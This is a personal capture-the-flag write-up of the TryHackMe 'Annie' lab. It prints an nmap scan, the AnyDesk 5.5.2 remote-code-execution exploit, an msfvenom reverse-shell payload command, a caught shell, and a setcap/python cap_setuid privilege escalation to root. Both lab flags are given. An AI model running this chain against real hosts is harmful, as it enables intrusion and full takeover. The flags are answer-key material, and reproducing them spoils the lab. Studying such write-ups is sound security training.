Annie
Remote access comes in different flavors. Another Try Hack Me free room, this one is classified with medium difficult.
First thing I try is to see if there’s some web response. No answer after trying to reach through port 80. Okay, I would run nmap anyway.
w1zard in try-hack-me/rooms/annie
nmap -Pn -p- -oA nmap-fullports-annie 10.10.92.77
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-11 17:35 -03
Nmap scan report for 10.10.92.77
Host is up (0.35s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
7070/tcp open realserver
43353/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 1082.16 seconds
Right, we can run the default script scan along with the service/version detection.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 72d72534e807b7d96fbad6981aa317db (RSA)
| 256 721026ce5c53084b6183f87ad19e9b86 (ECDSA)
|_ 256 d10e6da84e8e20ce1f0032c1448dfe4e (ED25519)
7070/tcp open ssl/realserver?
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=AnyDesk Client
| Not valid before: 2022-03-23T20:04:30
|_Not valid after: 2072-03-10T20:04:30
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
I kinda wanted a version number, but let’s work with what we have in hand. Let me look for some exploits.
w1zard in try-hack-me/rooms/annie
searchsploit anydesk
----------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------- ---------------------------------
AnyDesk 2.5.0 - Unquoted Service Path Privilege Escalation | windows/local/40410.txt
AnyDesk 5.4.0 - Unquoted Service Path | windows/local/47883.txt
AnyDesk 5.5.2 - Remote Code Execution | linux/remote/49613.py
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Going straight for the RCE.
w1zard in try-hack-me/rooms/annie
searchsploit -m 49613
Exploit: AnyDesk 5.5.2 - Remote Code Execution
URL: https://www.exploit-db.com/exploits/49613
Path: /usr/share/exploitdb/exploits/linux/remote/49613.py
Codes: CVE-2020-13160
Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/w1zard/Documents/labs/try-hack-me/rooms/annie/49613.py
A bit of inspection and, oh, great, there’s a link for a walkthough. I just have to change target IP, port and create a shellcode payload using MSVenom.
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.y.y LPORT=4444 -b "\x00\x25\x26" -f python -v shellcode
Shellcode goes into exploit, and exploit does nothing. I tried running the exploit a couple times, thought the machine was wonky and rebooted it. Executed the exploit a couple more of times, nothing. Fvck. Changed absolutely nothing, run the exploit a few more times…
connect to [10.13.3.36] from (UNKNOWN) [10.10.128.217] 45640
No logic, just repeat the same thing and maybe you’ll get a different result.
python3 -c 'import pty;pty.spawn("/bin/bash")'
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
annie@desktop:/home/annie$ cat user.txt
cat user.txt
THM{N0t_Ju5t_ANY_D3sk}
Now for the privilege escalation, the way I found was through files owned by root
.
find / -perm -4000 -type f -exec ls -al {} 2>/dev/null \;
annie@desktop:/home/annie$ find / -perm -4000 -type f -exec ls -al {} 2>/dev/null \;
< -perm -4000 -type f -exec ls -al {} 2>/dev/null \;
-rwsr-xr-x 1 root root 10232 Nov 16 2017 /sbin/setcap
-rwsr-xr-x 1 root root 43088 Sep 16 2020 /bin/mount
-rwsr-xr-x 1 root root 64424 Jun 28 2019 /bin/ping
-rwsr-xr-x 1 root root 44664 Jan 25 2022 /bin/su
-rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
-rwsr-xr-x 1 root root 26696 Sep 16 2020 /bin/umount
-rwsr-xr-- 1 root dip 378600 Jul 23 2020 /usr/sbin/pppd
-rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 436552 Mar 2 2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 14328 Jan 12 2022 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-sr-x 1 root root 10232 Dec 14 2021 /usr/lib/xorg/Xorg.wrap
-rwsr-xr-- 1 root messagebus 42992 Jun 11 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 22528 Jun 28 2019 /usr/bin/arping
-rwsr-xr-x 1 root root 40344 Jan 25 2022 /usr/bin/newgrp
-rwsr-xr-x 1 root root 149080 Jan 19 2021 /usr/bin/sudo
-rwsr-xr-x 1 root root 18448 Jun 28 2019 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 76496 Jan 25 2022 /usr/bin/chfn
-rwsr-xr-x 1 root root 75824 Jan 25 2022 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 44528 Jan 25 2022 /usr/bin/chsh
-rwsr-xr-x 1 root root 59640 Jan 25 2022 /usr/bin/passwd
-rwsr-xr-x 1 root root 22520 Jan 12 2022 /usr/bin/pkexec
setcap
is standing off from the list. Let me have a look at this.
Okay, you can force capabilities upon programs using setcap
and they can be exploited by passing them malicious commands or arguments which are then run as root
. Thanks HackTricks.
annie@desktop:/home/annie$ which python3
which python3
/usr/bin/python3
annie@desktop:/home/annie$ cp /usr/bin/python3 .
cp /usr/bin/python3 .
annie@desktop:/home/annie$ /sbin/setcap cap_setuid+ep /home/annie/python3
/sbin/setcap cap_setuid+ep /home/annie/python3
annie@desktop:/home/annie$ ./python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
<c 'import os; os.setuid(0); os.system("/bin/bash")'
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
root@desktop:/home/annie# cat /root/root.txt
cat /root/root.txt
THM{0nly_th3m_5.5.2_D3sk}